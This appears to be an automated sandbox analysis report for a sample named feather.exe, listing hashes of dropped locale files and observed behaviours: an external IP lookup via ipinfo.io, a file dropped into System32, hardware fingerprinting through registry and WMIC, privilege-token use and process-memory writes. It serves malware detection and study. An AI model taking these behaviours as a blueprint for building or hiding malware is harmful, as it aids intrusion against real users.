SHA256 0ebb125a0bdfd1e21b79914ca8e279790d41f7bac35bf2d031dd7981f1c1c056
SHA512 666ceb24d2e568a00a77512295e224a6545bf6abcfa19c93aa823db5330117fcb39fde570e7601dbd41976950c3ec03634f89fc5d9203357515e6651ab0b6d32

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ml.pak

MD5 6e96eddfe80da6aaa87f677feef4d1d6
SHA1 8a998785d56bc32b15cee97b172cd2dcdc8508d9
SHA256 e2fb73353ab05eb78f9845bdbdf50b64c9fb776b7f08948f976fe64e683397c4
SHA512 feea11dfc6ec153ab903b5828306617eedeee19daa73bd046ae47757795fecb9abce6192bb3a9561aaace7fc85ee442057b93081c6c986855b819fd38815e6f7

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\lv.pak

MD5 e75cdda386dd3131e4cffb13883cda5f
SHA1 20e084cb324e03fd0540fff493b7ecc5624087e9
SHA256 ae782f1e53201079ca555baa5ec04b163188e5161242d185f04a606a49fc8c0d
SHA512 d27bc61028031946ed6708918f921c3d681c8962b8d5507a91ab6576e3b2c462524e550305db87ede886e41fb0e49edec2d84cdbbad675282105627e01d98bf5

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\lt.pak

MD5 3e9119a712530a825bca226ec54dba45
SHA1 10f1b6bf2fa3a1b5af894d51b4eb47296c0dbc36
SHA256 3da531a9a5870315823e74b23031cb81379d2d94ae9894a7fb1d8a8ad51a2da9
SHA512 765c872cafa1b266575b0cac09dfa796cdb860bd82e1c657397fe2aada11771f306b0a1776e4d66ff41e94b153c812592430f31e7b1ff97abe7d8e6b96d321f1

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ko.pak

MD5 38a95d783d627e9a83ad636faa33c518
SHA1 cb57e8e9ef30eb2b0e47453d5ec4f29cea872710
SHA256 0d9b23e2981412d11ecea3ade8d521a073802d9431c39d72b88f62b98e50a96b
SHA512 4119b8f82107473c941c9e10b6bae97d60c9c47570cc2b40f429a95f4f5cca77eecbacd7023af439429026f6e55ad9df19998c8b98be0d04d384b310d025c0dc

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\kn.pak

MD5 32e5f528c6cee9de5b76957735ae3563
SHA1 74a86191762739d7184b08d27f716cfa30823a98
SHA256 cd297f7e872b34e63ca2d98dc2fa79085e8a2985ba8757601e4b901a3f30b013
SHA512 92d100b1289e63fd0dc65657fb4b1e16f298735e6cd066e9122d04e3b79e0d286f15fc9f1da2c3a05af528b92bde95fcfbc493c466db2d94a0749adfbf7fb8d5

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\it.pak

MD5 ab160b6e8bbaba8f8bde7e2d996f4f2e
SHA1 eb7eae28a693337b8504e3e6363087b3b113bc72
SHA256 e86ba661b3f6f7ecd2312fe90b873330c0d6516a5501a0f326875844e8d4b289
SHA512 14e8919e2f5a7ad2b3f310ffec590b221e6e0dc45f37efc57ff9b8ff7a3ca674d6f4b9bd65e49a98af6726fa953f2168e5c8e6101ed977e8c7ff4a51203f8d4d

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\id.pak

MD5 bc719b483f20e9a0b4b88969941c869d
SHA1 4d926a9aba7c350e9da8aa570a9f52534c81aa88
SHA256 f175e58be47b228803aa32d2695e2fcfaf4655b65b96fb6b539b3e59593e6799
SHA512 ddf6108888676c1a90865daaa88198b681b685d9047b0e10f5aa08daa39a628a84732a8518606176529297bec51ce8bc39e910eeffc8b88e9585fafb694c35db

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\hu.pak

MD5 b93beeb1e35a29b310500fa59983f751
SHA1 45c0b2cab4c4a820cfc2aed4b7236ddc79a0db00
SHA256 bab09c3cb80130a4a288642633c2b31ab08b1757466d9a468bc36d276079f002
SHA512 249de5b8bd7c4755caa8b9552254d353b0d885b63bd5f7c6c8e29b3f4e447c9e8d6c0e88d5aaba0b898aa26880592b3904e19ca4797a2ac1dd757aaee782c37c

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\hr.pak

MD5 af7aec4b45ead620463b732e16f63e47
SHA1 e6838c56b945c936fdb87389fdc80cdf7bc73872
SHA256 bfeeafe2f8a9f797d20c4209181c4768fbea4a61ff2dc1f57f6cd18bc872fc13
SHA512 784ff8dc6011883e931b4b8371e5ada960120931bfdf24f81648f5092fa31db1d03e5d3cf5cd16d57ea7fb7877bb25a28533085ab42bfe40dc25ca7d9cee7ade

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\hi.pak

MD5 9e1788b0f3e330baf2b9356a6c853b20
SHA1 a2f4b37a418669e2b90159c8f835f840026128d9
SHA256 c640313e10e985a58d16f928d2428ae278421a070d948733ac68fdf7312090fd
SHA512 b9a577e084f8daeb53fad0a9423661c99cab272125899a16b0b052606a2cb88f823137f3a21b5c06b10e0235321b7faca84cd759bf406fb2dd02c2f598e92cb5

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\gu.pak

MD5 225167dbdf1d16b3fafc506eb63f6d1d
SHA1 8651b77f41e3c5b019ccb124a7c8f6449a04b96c
SHA256 ff379dd77136b9b85e7e9fcb5b261ace9c6d9184af3ba2dea35b1757b9bab6d9
SHA512 a353d36a87b6608578816056647de45a456f9012d399b2cb5cb7b9de867a370fcaf1a90d293f367b9b678d13991294425abd85cf77e971afa0d3e9c316952115

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\fr.pak

MD5 d8b4bc789a0c865fb0981611fb5dcdbc
SHA1 33f9f03117f0bba56a696f2fa089ba893ee951a2
SHA256 52aa0a18ace6347b06a89e3851a1b116812c022dbe41da8942278878b5409cee
SHA512 58d19e5a3c68c901fa2a0c327a45b410ab9b9e6c39298db48eed25345453dce1a4633afe6277cf53ed558e160065b89c0e38a32caeced47e79783dbda4d74f26

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\fil.pak

MD5 7354de570c8132723c8e57c4ccb4e7c4
SHA1 177780faf460e3c8a643a4d71c7a4621345a8715
SHA256 91149190c856195fb330605686acf09c7197e5b7efe37fe2a7c76bb8fb08cc89
SHA512 a8487a6a7fd46d62e78ca4262de49e12c120268561ee61a642c45efa48116edebeb40cf9e8be229db0bbf06bb6b5457cc54399a08ee6a603e5540ef5ca482798

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\fi.pak

MD5 fe011231bbc8b3a74652f6a38f85bc88
SHA1 2b851e46738d466b3a5a470de114d15051b6eb6b
SHA256 7a3249514585491eb47fe4b579edc27ccc48761e7ad6bc11d113b257132c5dd2
SHA512 2a4e5c1409347b4b514556c81ef32c8ae118add28e3469717b13045c8424fed9b817c7988629050ed3e732e0cdca181891b6a8b9e64e4c8d65f004d7c8db9796

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\fa.pak

MD5 c770cfb9fbabda049eb2d87275071b54
SHA1 20e41b1802c82d15d41fadaf3dcd049b57891131
SHA256 dae7e7c87026cd4e8a4cd813cc71def32c86ed47865ce6da5383b66b7021c5bc
SHA512 cda117a60c853f12ade579c34fce22d992b33df1f5001a237767b6e642d5c775c3387bcee05d6557fe5a2f6235f93258954a697d3b9812d2550c4801869f4751

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\es.pak

MD5 a24e01a4947d22ce1a6aca34b6f2a649
SHA1 750c2550465c7d0d7d1d63ad045b811b4a26dc55
SHA256 848d422be1b8fae74786ed6d6dfa7dd2e97b798b4a9ba1d929085e425b2a54e0
SHA512 02fc4ce96aa523ebc204243bbec3347b09cb20bcc0ba66cf9532a6fb26c48f7f2396bbb833f1916f8f081ffc9c6cd2de07315e66c5115042a0b44270fa4468c1

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\es-419.pak

MD5 6f4613a4a88af6c8bd4ef39edeee3747
SHA1 c8850a276d390df234258d8de8c6df79240c8669
SHA256 8f7b8776e61e3ed5aa33b1a571ac834653b54b12a499d956b95d567b7e1ba987
SHA512 e5933dcb2aaaa2018ba8b13f4af3dc8a950640ac60acb1b56ad6de24541701d0ffc1f4cb28c7932af924bfd673edcee20bf649156ab95ea9499ec43c703ea141

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\en-US.pak

MD5 626f30cfd9ad7b7c628c6a859e4013bd
SHA1 02e9a759c745a984b5f39223fab5be9b5ec3d5a7
SHA256 0fd74bb69ad35b3f9391fa760bf0eb0ee73d2bea0066244577ef2abd269513de
SHA512 9ce902f21fef70c5b5af444b532b36c9a00d896878cb4021c9b1dc07aa3277d956bca65ee0adb68467eec113e535b60a8a5fb5414c7d0ca761ceae5c43b7d9a9

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\en-GB.pak

MD5 9d9121bdc9af59b5899ce3c5927b55d8
SHA1 568626a374cd30237c55b72c74b708da8d065ec1
SHA256 f4d45ccc89834376f35d4d83fe5b2d5112b8cc315fcb03228720749aae31c805
SHA512 149a8acf256dc12f62706f72ad8ec88cbfdf7f8dc874bcd9facf484cdb00e7c5787f5e1bbc12b5bbe1b19b6524e7e8a1c7dba2838abeb9aafa3ce89795fd22ae

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\de.pak

MD5 2163820cd081fdd711b9230dc9284297
SHA1 c76cc7b440156e3a59caa17c704d9d327f9f1886
SHA256 6d787033c94755cc80c187ed8a9de65808bb4d7968354bbb94b7868ac2e8d205
SHA512 920fa2a10f7aa7f1f6d911fe2a77eded0384617d8fd863943afd99a584dab3fb2ea3e5d2e20bca529689a99fdf303912007f2918c62482d8a90194a810f6e535

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\da.pak

MD5 1939faa4f66e903eac58f2564eeb910e
SHA1 bace65ee6c278d01ccf936e227e403c4dff2682d
SHA256 0b9da7bd6531a7ebe7d8188b320c0953adcfbaf654037f8265261a12e63d3c87
SHA512 51588d2fe724e6c407724ea6f46883ded39397af744effaf672f75952a6a734e61e93e59f446080317f2a2b3fa1b45e7405f90fe0b226c44c9f3dd9a4e130a87

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\cs.pak

MD5 06e3fe72fdc73291e8cf6a44eb68b086
SHA1 0bb3b3cf839575b2794d7d781a763751fe70d126
SHA256 397134d1834f395f1c467a75d84ef2e8545cb0f81e94dbe78b841fbbdaad802d
SHA512 211594c30ad4f5ca8813596b59751168c60dfa0d13f24f2aa608fce82d21c2de3de69fe007c4bde1602da8aa7ea81ec0f15e173abc1224362c36b493b425b425

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ca.pak

MD5 2d30c5a004715bc8cd54c2e21c5f7953
SHA1 fed917145a03d037a32abac6edc48c76a4035993
SHA256 d9c45d55a9a5661063b9bbebb0615de8f567f3925d04fd10938da9617c6220e0
SHA512 b3803551f53d290d8839789f829afc9c1e12052c81ba20d5e01fb3d2bacd5d1e97bd4c05074322eed17fdec04c9176c655076faec8a3aef17c39fb999e0c1fcf

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\bg.pak

MD5 a69f6075863d47b564a2feb655a2946f
SHA1 062232499ff73d39724c05c0df121ecd252b8a31
SHA256 a5eb7038ed956bad7704a722f05691474ff709dffbad92b8e31dbb869ad58334
SHA512 930ce3938aa02a8bcc609a64bd86b7e6164d63baad157a980fd079859a6bee5db87bd1f7a74a71108f8368bc9c6154bf14a2dba1abf269f572bc262614bcf1db

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ar.pak

MD5 3c2ab7363018db1f20b90acbc305cb4c
SHA1 60b9cf453178ad0e60faf20d137a0c7eabde65c9
SHA256 3ca47b9c436723f837a53b2904b51efdf13ab6cad2f3ef4fe48a1115847eccbf
SHA512 589beb3e95e93f30341933c9b9826210e6bf3e9c1ad8f113d9d8a98fa5a526f81e454ee3357fb55d60d67a4890ce33e964ba2fa810e1771a6b7e82746492313a

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\am.pak

MD5 3cfd7c5bb92ab72c63e003208a9e4529
SHA1 165d2f69ab6a6e237f0fec943b5577123cefea87
SHA256 12e9e1bec1c46e5ea706157726e17a4429acf288a5754fa183bd9b4cf7d3853b
SHA512 cd7c7837d758ea66abc871503cda6fe99ff45990405e60c1133e7c1f4cb29ee69723c9558bb2d3eccb42948da57351f4f095062616686ab2e255acd3c86236f0

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

Signatures

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1660 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 1660 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 3428 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3428 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
